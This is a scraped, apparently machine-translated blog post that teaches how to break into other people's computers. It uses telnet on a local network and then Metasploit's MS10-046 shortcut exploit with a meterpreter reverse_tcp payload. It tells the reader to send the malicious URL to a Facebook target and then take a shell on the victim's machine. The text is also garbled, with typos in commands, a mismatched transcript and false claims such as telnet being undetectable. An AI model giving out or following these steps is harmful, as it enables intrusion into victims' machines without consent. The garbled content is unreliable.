Skip to content Skip to sidebar Skip to footer

How to Hack Other People's Computers Via IP Address in CMD 2022

How to Hack Other People’s Computers Via IP Address in CMD – Have you ever watched the best hacker movies Who Am I ? if you have watched it then you will see the action of hackers hacking electricity in a large building.

Then whether hacking or hacking electricity can be done in the real world? the answer is yes, you can do this method on a PC or laptop with the help of the tool CMD (Command Prompt) and requires telnet facilities.

Also Read 16 PC Hacker Applications

2 Ways to Enter Other People’s Computers via IP Address in CMD / Terminal

Hacking or hacking is an act that sometimes makes people dislike hackers, even though you yourself like hacking computers like controlling other people’s computers remotely via CMD, because basically CMD has various benefits that many don’t know about.

Below we share 2 ways to enter other people’s computers via IP addresses with Windows CMD and terminals on Linux, listen carefully.

1. How to Hack a Computer Via CMD

Powerful Tricks to Infiltrate Other People's Computers or Laptops Without Being Known
Powerful Tricks to Infiltrate Other People’s Computers or Laptops Without Being Known

Telnet is one of the facilities that is often used to remotely PC in a network via underdos (CMD). How to enter someone else’s computer via IP address.

But sometimes the telnet command often fails to connect because the telnet configuration has not been activated, if it is not natural, the telnat command cannot be used.

Actually, the telnet command is almost similar to the remote desktop command, the difference is that telnet is safer because you will not be known or take over a computer, if you can do telnet, you will automatically control the computer.

First of all, for how to hack your computer, you can try to check the telnet configuration on your computer, how to do it:

Press the Windows key + R (click Run – type CMD and then click OK) until the Dos display appears

To check whether the telnet function can be done or not, you should first check what computer is running, now type the following command.

-net view , check which network (host) is currently active.

Then you can try to check which ports you can break into the PC.

Also Read 10 Minutes Works! How to Hack Facebook

Pay attention to the Foreign Address section, there you get an open port with port 139, if it’s like that, try to telnet (space) the destination IP (space) noPort:

telnet 192.168.16.66 139

Ok Maybe that’s how to check open ports on a particular host.

Now we return to the telnet command to remotely other computers that are connected to your computer. now you try telnet PC03, the method is the same as above.

Telnet 192.168.16.8 (enter), if successful it will display a display like this:

C:Documents and SettingsAdministrator>net view

Server Name Remark 

\PC03 lpkid 

\SERVER

\SERVER-2003

The command completed successfully.

C:Documents and Settings Administrator>ping 192.168.2.22

Pinging 192.168.2.22 with 32 bytes of data:

Request timed ot.

Reply from 192.168.2.22: bytes=32 time<1ms TTL=128

Reply from 192.168.2.22: bytes=32 time<1ms TTL=128

Requests timed out.

Ping statistics for 192.168.2.22:

Packets: Sent = 4, Received = 2, Lost = 2 (50% loss),

Approximate round trip times in milli-seconds:

Minimum = 0ms, Maximum = 0ms, Average = 0ms

C:Documents and SettingsAdministrator>telnet 192.168.2.22

Welcome to Microsoft Telnet Client

Escape Character is ‘CTRL+]’

You are about to send your password information to a remote computer in Internet zone. This might not be safe. Do you want to send anyway(y/n): n (enter n, then enter)

Welcome to Microsoft Telnet Service

login: ……

password:******

Welcome to Microsoft Telnet Server.

C:Documents and Settingsadmin>

To make sure that we are actually on a PC03 computer, we try to do an IP check:

How to Hack a Computer Via CMD
How to Hack a Computer Via CMD

Welcome to Microsoft Telnet Server.

C:Documents and Settingsadmin>ipconfig 

Windows IP Configuration

Ethernet adapter Local Area Connection 2:

Connection-specific DNS Suffix . :

IP Address. . . . . . . . . . . . : 192.168.2.22

Subnet Mask . . . . . . . . . . . : 255.255.255.0

Default Gateway . . . . . . . . . : ?

C:Documents and Settingsadmin>

To be able to enter the telnet service, you must first activate it, then which clients/admins can telnet. Well, now you can control the computer that you are currently controlling, for example to restart:

C:Documents and Settingsadmin>shutdown/?

Usage: shutdown [-i | -l | -s | -r | -a] [-f] [-m \computername] [-t xx] [-c "c

2. How to Remotely Infiltrate Other People’s Computers Via Terminal

This method of tapping other people’s computers or laptops and PCs will use the help of the CMD tool using the terminal on Linux, which in my opinion is much more complex in terms of hacking tools than on Windows XP, 7, 8, and 10.

However, even though the hack using backtrack or linux this time will hack other people’s computer systems via WiFi or via the internet or how to enter other people’s computers via ip addresses, because without an internet connection you can’t connect to the system, how to hack someone’s laptop or computer. You should use these other things wisely and don’t abuse them.

How to Hack Mikrotik Router With Python
How to Hack Mikrotik Router With Python

Also Read Cool CMD Commands Like Hackers

This cmd hack or terminal method on Linux has been known in the hacker community because backtrack has advantages that are highly recognized by Android users, backtrack itself has various versions from 1, 2, 3, 4, 5 and so on.

In addition, there is a derivative of the backtrack kernel that you can use because it has the same complete tools as Backbox, Kali Linux, and so on.

How to Hack Other People’s Computers Through CMD Remotely is only a medium of learning and adding to your hacking skills. Here’s how to remotely hack into another computer.

Open Metasploit In CMD or Terminal Backtrack
Open Metasploit In CMD or Terminal Backtrack

1. Open Metasploit in CMD or Backtrack Terminal

First, please download metasploit first, then you first open CMD or terminal and then please run metasploit.

Then type the command “cd (location of directory)For example, the location is in cd c:\metasploitpress enter.

Then type the next command sudo chmod +x (metesploit name).

run press enter.

Next code command sudo ./(metasploit name)

run press enter

and type next msfconsole press enter.

Then you type use exploit/windows/browser/ms10_046_shorcut_icon_dllloader

Download Metasploit

2. Knowing the IP Address of Other People’s Computers

How to Hack Other People's Computers Using CMD Tool Easily
How to Hack Other People’s Computers Using CMD Tool Easily

After that please type ifoncfig and you will see your ip address, after that type set srvhost (your ip address) press enter and set lhost (your ip address).

Next, type set PAYLOAD windows/meterpreteer/reverse_tcp press enter and to find out whether it is successful or not, type show options next type exploitand you will get an ip url, for example like url address http://192.???.?? and next you send the url address via facebook which is your target to click on your url address.

Next, you will find out the victim who has clicked on the url address by typing sessions -i and type again sessions -i 1.

Also Read CMD Hack Wifi Code

3. How to Get Into Someone Else’s Computer With CMD or Terminal

After on sessions -i you will see which computers have clicked on your ip url address and now you will execute the target by typing shell sysinfo and you will see various directory or a folder on your target computer.

Also Read How to Hack FB with Termux

Well, that’s how to hack other people’s computers using CMD and how to remotely infiltrate other people’s computers. The method above can be knowledge for those of you who want to know the world of hacking more deeply.

So, use the ways to hack the computer above wisely, you should not use the above method carelessly because it can harm other people.

You can also practice how to infiltrate other people’s computers, perhaps on your own friends and of course with prior approval so that no one feels disadvantaged. Thank you.